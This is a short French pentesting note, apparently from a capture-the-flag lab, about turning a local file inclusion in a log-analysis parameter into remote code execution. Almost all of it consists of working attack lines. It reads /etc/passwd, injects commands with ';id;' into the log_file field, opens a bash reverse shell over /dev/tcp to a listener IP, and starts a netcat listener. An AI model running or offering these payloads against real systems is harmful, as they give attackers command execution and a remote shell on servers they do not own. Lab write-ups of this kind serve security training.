Log Poisoning (RCE) - Pentesting Web

Vulnérabilité (LFI - RCE) Log Poisoning:

Si nous essayons de lister un fichier comme /etc/passwd, par exemple :

log_file=/etc/passwd  &analyze_log=/etc/passwd

Le fichier est listé :)

Nous allons ensuite essayer de lire le fichier contenant le flag root et nous observons qu'il est possible d'exécuter des commandes (comme id) :

log_file=/root/root.txt;id;----&analyze_log=/root/root.txt

Pour obtenir un reverse shell, nous exécutons la commande suivante :

bash -c "bash -i >%26 /dev/tcp/192.168.71.128/443 0>%261"

log_file=/root/root.txt;bash -c "bash -i >& /dev/tcp/10.10.14.89/443 0>&1";---&analyze_log=/root/root.txt

Ensuite, nous nous mettons en écoute avec nc :

nc -nvlp 443

Mis à jour il y a 1 an